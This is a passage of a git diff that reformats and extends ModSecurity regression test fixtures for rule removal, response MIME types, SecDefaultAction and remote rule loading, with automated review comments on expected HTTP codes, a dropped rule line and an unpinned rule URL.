Removed by a SecRuleRemoveByMsg directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByMsg whee", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/config-remove_by_tag.json b/test/test-cases/regression/config-remove_by_tag.json index 09681546ac..3809413e44 100644 --- a/test/test-cases/regression/config-remove_by_tag.json +++ b/test/test-cases/regression/config-remove_by_tag.json 
@@ -1,39 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByTag (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByTag (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by a SecRuleRemoveByTag directive" + "expected": { + "debug_log": "Skipped rule id '2'. Removed by a SecRuleRemoveByTag directive", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByTag tag123", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim,tag:tag123\"", 
@@ -41,40 +45,44 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByTag (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByTag (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '3'. Removed by a SecRuleRemoveByTag directive." + "expected": { + "debug_log": "Skipped rule id '3'. Removed by a SecRuleRemoveByTag directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByTag whee", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/config-response_type.json b/test/test-cases/regression/config-response_type.json index 621ab38a20..c85e8c9e9c 100644 --- a/test/test-cases/regression/config-response_type.json +++ b/test/test-cases/regression/config-response_type.json 
@@ -1,128 +1,138 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyMimeType (1/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyMimeType (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"T \\(0\\) t:trim: \"no need.\"" + "expected": { + "debug_log": "T \\(0\\) t:trim: \"no need.\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", - "SecResponseBodyMimeType text\/plain text\/html text\/xml", + "SecResponseBodyMimeType text/plain text/html text/xml", "SecRule RESPONSE_BODY \"@contains RESPONSE_CONTENT_TYPE\" \"id:9,pass,t:trim,phase:4\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyMimeType (2/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyMimeType (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Response Content-Type is text/html. It is not marked to be inspected." + "expected": { + "debug_log": "Response Content-Type is text/html. 
It is not marked to be inspected.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", - "SecResponseBodyMimeType application\/something", + "SecResponseBodyMimeType application/something", "SecRule RESPONSE_BODY \"@contains RESPONSE_CONTENT_TYPE\" \"id:9,pass,t:trim,phase:4\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyMimeType (3/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyMimeType (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Response Content-Type is text/html. It is not marked to be inspected." + "expected": { + "debug_log": "Response Content-Type is text/html. It is not marked to be inspected.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", - "SecResponseBodyMimeType text\/plain text\/tml text\/xml", + "SecResponseBodyMimeType text/plain text/tml text/xml", "SecResponseBodyMimeTypesClear", "SecRule RESPONSE_BODY \"@contains RESPONSE_CONTENT_TYPE\" \"id:9,pass,t:trim,phase:4\"" ] } - - ] 
diff --git a/test/test-cases/regression/config-secdefaultaction.json b/test/test-cases/regression/config-secdefaultaction.json index bb3d7d8104..ce58f20ca2 100644 --- a/test/test-cases/regression/config-secdefaultaction.json +++ b/test/test-cases/regression/config-secdefaultaction.json 
@@ -1,57 +1,58 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: supporting transformation", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: supporting transformation", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + 
"Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"lowercase: \"300\"", - "error_log":"" + "expected": { + "debug_log": "lowercase: \"300\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,t:lowercase,pass\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"phase:2,id:1,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", 
@@ -59,58 +60,59 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: supporting transformation + t:none", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: supporting transformation + t:none", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; 
charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":" Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" ", - "error_log":"" + "expected": { + "debug_log": " Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,t:lowercase,pass\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"t:none,phase:2,id:1,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", @@ -118,14 +120,41 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: t:none", - "expected":{ - "parser_error":"The transformation none is not suitable to be part of the SecDefaultActions" - }, - "rules":[ + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: t:none", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "The transformation none is not suitable to be part of the SecDefaultActions" + }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,t:none\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"t:none,phase:2,id:1,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", 
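Review bot: `"http_code": 200` now sits next to `parser_error` in the `SecDefaultAction: t:none` case, which reads as if a request were processed and answered with 200 even though the case expects the rule set to be rejected at load time. The added `client`, `server`, `request` and `response` stubs (`"ip": ""`, `"port": 0`, `"method": ""`) have the same effect; presumably none of them is consulted once parsing fails, though the harness is not visible here. Leaving `expected` as `{ "parser_error": "The transformation none is not suitable to be part of the SecDefaultActions" }` and dropping the stubs would keep the rejection as the only thing the case asserts. The same applies to the `action not suitable` and `twice` cases in the `@@ -192,30 +222,83 @@` hunk and to the `failed download (Abort)` case in config-secremoterules.json.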
@@ -133,58 +162,59 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: simple test", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: simple test", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" 
}, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test, text\/html,application", - "error_log":"" + "expected": { + "debug_log": "Saving msg: This is a test, text/html,application", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,log,auditlog,pass\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", 
@@ -192,30 +222,83 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: action not suitable", - "expected":{ - "parser_error":"The action 'id' is not suitable to be part of the SecDefaultActions" - }, - "rules":[ + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: action not suitable", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "The action 'id' is not suitable to be part of the SecDefaultActions" + }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,id:1,log,auditlog,pass,tag:'teste'\"", - "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,tag:'teste',t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: twice", - "expected":{ - "parser_error":"SecDefaultActions can only be placed once per phase and configuration context. Phase 2 was informed already." - }, - "rules":[ + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: twice", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "SecDefaultActions can only be placed once per phase and configuration context. Phase 2 was informed already." 
+ }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,log,auditlog,pass,tag:'teste'\"", "SecDefaultAction \"phase:2,log,auditlog,pass,tag:'teste'\"", 
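Review bot: The `action not suitable` case loses its `SecRule REQUEST_HEADERS ... id:1,tag:'teste'` line with no replacement on the new side, as far as this hunk shows, and the commit message does not mention it. The expected `parser_error` concerns `id` inside `SecDefaultAction`, so the outcome probably does not change, but the fixture no longer contains a rule that shares `id:1` with the default action. If the removal is intentional, say so in the commit message; otherwise keep the line in `rules`. The `rules` array of the `twice` case continues past the end of this hunk.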
@@ -224,58 +307,59 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: status + redirect", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: status + redirect", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": 
"length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Request was relevant to be saved.", + "expected": { + "debug_log": "Request was relevant to be saved.", "http_code": 302 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,log,auditlog,status:302,redirect:'http://www.google.com'\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"phase:2,id:1,block\"", diff --git a/test/test-cases/regression/config-secremoterules.json b/test/test-cases/regression/config-secremoterules.json index 5065e06b64..ce86bd3d7a 100644 --- a/test/test-cases/regression/config-secremoterules.json +++ b/test/test-cases/regression/config-secremoterules.json 
@@ -1,95 +1,130 @@ [ { - "enabled":1, - "version_min":300000, + "enabled": 1, + "version_min": 300000, + "title": "Include remote rules", "resource": "curl", - "title":"Include remote rules", - "client":{ - "ip":"200.249.12.31", - "port":123 + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Executing operator \"PmFromFile\" with param \".*\" against REQUEST_FILENAME" + "expected": { + "debug_log": "Executing operator \"PmFromFile\" with param \".*\" against REQUEST_FILENAME", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRemoteRules key https://raw.githubusercontent.com/owasp-modsecurity/ModSecurity/refs/heads/v3/master/test/modsecurity-regression-rules.txt", "SecRule ARGS \"@contains somethingelse\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, + "enabled": 1, + "version_min": 300000, + "title": "Include remote rules - failed download (Abort)", "resource": "curl", - "version_min":300000, - "title":"Include remote rules - failed download (Abort)", - "expected":{ + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Failed to download" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRemoteRulesFailAction Abort", "SecRemoteRules key https://gist.githubusercontent.com/zimmerle/a4c1ec028999f7df71d0cc80f4f271ca/raw/4c74363bf4eae974180f1a82007196e58729dd16/modsecurity-regression-test-secremoterules-bonga.txt" ] }, { - "enabled":1, + "enabled": 1, + "version_min": 300000, + "title": "Include remote rules - failed download (Warn)", "resource": "curl", - "version_min":300000, - "title":"Include remote rules - failed download (Warn)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - 
"uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"somethingelse\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"somethingelse\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRemoteRulesFailAction Warn", "SecRemoteRules key https://gist.githubusercontent.com/zimmerle/a4c1ec028999f7df71d0cc80f4f271ca/raw/4c74363bf4eae974180f1a82007196e58729dd16/modsecurity-regression-test-secremoterules-bonga.txt", diff --git a/test/test-cases/regression/config-update-action-by-id.json b/test/test-cases/regression/config-update-action-by-id.json index 4e1a3fc24e..606ea921b8 100644 --- a/test/test-cases/regression/config-update-action-by-id.json +++ b/test/test-cases/regression/config-update-action-by-id.json 
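Review bot: The new `"http_code": 200` and the `debug_log` match in `Include remote rules` depend on whatever `refs/heads/v3/master` serves when the test runs, because the `SecRemoteRules` URL in that case (unchanged by this commit) points at a branch head rather than at fixed content. A later upstream edit to that file would change the rules this suite loads and could make the expectation fail, or pass for the wrong reason. The two gist URLs further down the file already carry a revision hash; pinning this one the same way, e.g. `.../ModSecurity/<commit-sha>/test/modsecurity-regression-rules.txt`, or loading the fixture from the local tree, would make the case reproducible. The last `rules` array appears to continue past the end of the hunk.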
